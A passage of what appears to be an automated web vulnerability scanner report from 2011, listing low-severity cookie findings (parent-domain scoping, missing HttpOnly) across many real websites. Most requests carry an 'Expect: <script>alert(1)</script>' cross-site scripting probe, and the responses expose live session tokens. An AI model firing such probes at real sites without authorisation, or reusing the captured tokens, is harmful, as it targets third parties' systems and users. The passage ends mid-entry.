Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...

16.62. http://www.kylotteryretailers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kylotteryretailers.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kylotteryretailers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:33:35 GMT
Server: IBM_HTTP_Server
Vary: Accept-Encoding
Content-Length: 476
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-a010362=a010302:0;Domain=kylotteryretailers.com;Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

16.63. http://www.schwabbankcreditcard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schwabbankcreditcard.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schwabbankcreditcard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:52:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=77F71A24745610746457FBAF17E09359; Path=/; Domain=.schwabbankcreditcard.com
Set-Cookie: TLTUID=77F71A24745610746457FBAF17E09359; Path=/; Domain=.schwabbankcreditcard.com; Expires=Mon, 02-05-2021 00:52:34 GMT
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17. Cookie without HttpOnly flag set
There are 170 instances of this issue:


17.1. http://dg.specificclick.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dg.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?y=3&t=h&u=http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml&r= HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7e-J^1^1; ug=wJ6hSWn821G3dA; smdmp=7e-J:811200901; adf=7e-J^0^0; JSESSIONID=e6b9ee4de5a3ea16db33db035dfa

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=e6cd1ea613a500dd6ba371035dc2; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 02 May 2011 01:57:37 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 569

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...

17.2. http://t.mookie1.com/t/v1/event

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/event?migClientId=1392&migAction=cntwir_servicefamilyoverview_1&migSource=mig HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:09 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Fri, 25-May-12 23:35:09 GMT; domain=.mookie1.com
Set-Cookie: session=1304292909|1304292909; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

17.3. http://www.92kqrs.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.92kqrs.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.92kqrs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 68
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDCSADQTQA=DOHBJHPCELCDEEPCDMDKOFHJ; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021f0d45525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.92kqrs.com:80/favicon.ico

17.4. http://www.bluesplayer.co.uk/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bluesplayer.co.uk
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bluesplayer.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:10:49 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b7c32b2936f1354d9728de7d69c9cd94; path=/
Set-Cookie: filter=include; path=/
Set-Cookie: ctemplate=default; path=/
Set-Cookie: ctheme=dark-tube; path=/
Content-Type: text/html
Content-Length: 17593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...

17.5. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:32:53 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=WXEJ2N3KRNFIDB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579474; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=609658d5a1ebcf5618d05b23302f38b7; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...

17.6. http://www.chart.dk/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.chart.dk
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chart.dk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:10:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NID DSP NOI COR"
X-Powered-By: ASP.NET
Content-Length: 1302
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQATRTRBQ=JICBFFGCDKJPOHGJFBHOFKAN; path=/
Cache-control: private


<!-- netcoders ASP errorhandler -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:FF0000}
a:visited        {font:
...[SNIP]...

17.7. http://www.clickinks.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickinks.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clickinks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Sun, 01 May 2011 23:49:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2jo5f13os0ec3z2tqss0vx1o; path=/; HttpOnly
Set-Cookie: OEM=; expires=Tue, 01-May-2001 23:49:24 GMT; path=/
Set-Cookie: MachineToken=676c3038-3d1e-4a84-ba81-895ddded8034; expires=Thu, 01-May-2031 07:00:00 GMT; path=/
Set-Cookie: phiddenId=ccd47da2-cd93-4362-834c-c48883e55ec6; expires=Tue, 03-May-2011 07:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Clickinks
...[SNIP]...

17.8. http://www.countrytabs.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.countrytabs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.countrytabs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Date: Mon, 02 May 2011 00:31:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /404.asp
Content-Length: 129
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCCSQRTD=GIGJDNNCENLLGKFGALLAMGIH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/404.asp">here</a>.</body>

17.9. http://www.crankyape.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.crankyape.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:20 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSARCDQAB=MKADMMGCLDEMBHOGIDLDIPPF; path=/
Vary: Accept-Encoding
Content-Length: 19683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Bank repo rvs, motorcycles, snowmobiles, atvs, boats, trucks, trailers, go karts,
...[SNIP]...

17.10. http://www.email-foodnetworkstore.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.email-foodnetworkstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.email-foodnetworkstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://www.foodnetworkstore.com/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSABDBCBB=MNHLLAJCKLCOHPLAMNKJNEKK; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:39:03 GMT


17.11. http://www.email-pauladeenstore.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.email-pauladeenstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.email-pauladeenstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://www.pauladeenstore.com//favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCDBRRTS=BKBNLAJCOJGBNGGAOGKBGOOE; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:13:50 GMT


17.12. http://www.hlsm.com/Demo/Main.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hlsm.com
Path:   /Demo/Main.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Demo/Main.asp HTTP/1.1
Host: www.hlsm.com
Proxy-Connection: keep-alive
Referer: http://www.hlsm.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:29:35 GMT
Content-Length: 11478
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQSSSDT=LMAOJGLAHOCFHPMLAIMAIALM; path=/
Cache-control: private

<html>
<head>
<title>HLSM's Electronic Parts Finder</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-fami
...[SNIP]...

17.13. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:53 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=arhh2v55sforoczguhtjd2jm; path=/
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0ec3660;expires=Mon, 02-May-11 03:22:24 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 dfw107003 (MII-APC/2.0)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...

17.14. http://www.ixfr.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ixfr.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ixfr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:00:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQCBAABQ=OFGNNCNCABNIINAGOJJGHJMA; path=/
Cache-control: private


17.15. http://www.jea.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jea.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jea.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:15 GMT
Location: http://www.jea.com/favicon.ico
Content-Length: 151
Content-Type: text/html
Set-Cookie: JEA=RedirectUrl=%2Ffavicon%2Eico; path=/
Set-Cookie: ASPSESSIONIDAAQDTTRB=MBABJKGAFDIDNHCKJIHEPJBC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.jea.com/favicon.ico">here</a>.</body>

17.16. http://www.lenox.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:48:38 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=18008498;expires=Tue, 23-Apr-2041 23:48:39 GMT;path=/
Set-Cookie: CFTOKEN=3f48e32aae5ed302-ADF6BB1C-F0A7-563B-641D8D97D77EEE98;expires=Tue, 23-Apr-2041 23:48:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...

17.17. http://www.lsitools.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lsitools.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lsitools.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: 1BC
X-Powered-By: ASP.NET
Content-Length: 2821
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASDCTAC=FIGHIEJCAKIFODBPPKNPODEM; path=/
Cache-control: private

<html>
<head>
   <title>LSI Tools | Expert solutions for the vacation rental industry.</title>
   <meta NAME="keywords" CONTENT="Expert Solutions for the Vacation Rental Industry">
   <meta NAME="descri
...[SNIP]...

17.18. http://www.milwaukee.gov/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.milwaukee.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.milwaukee.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 143
Content-Type: text/html
Location: /PageNotFound20051.htm
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQSBTDQST=BHOEPDGCMLHMEMHJBPAGNPHM; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:48:21 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/PageNotFound20051.htm">here</a>.</body>

17.19. http://www.muschealth.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.muschealth.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.muschealth.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Length: 3638
Content-Type: image/x-icon
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=49938950;expires=Wed, 24-Apr-2041 00:39:40 GMT;path=/
Set-Cookie: CFTOKEN=b89d06571cf50fa6-AE2572C1-23AE-EC0F-20992C2498FE81E8;expires=Wed, 24-Apr-2041 00:39:40 GMT;path=/
Set-Cookie: SESESSIONID=E2FC3C05A06720867BE11E7034084CAA;path=/
Set-Cookie: SESESSIONCODE=E9EE53714B49CE7CE74D917F84674BF5;path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:39:40 GMT
Set-Cookie: NSC_tjuffyfd-fyu=ffffffff831fd44345525d5f4f58455e445a4a423660;expires=Mon, 02-May-2011 15:39:40 GMT;path=/

...[SNIP]...

17.20. http://www.mylearningplan.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mylearningplan.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
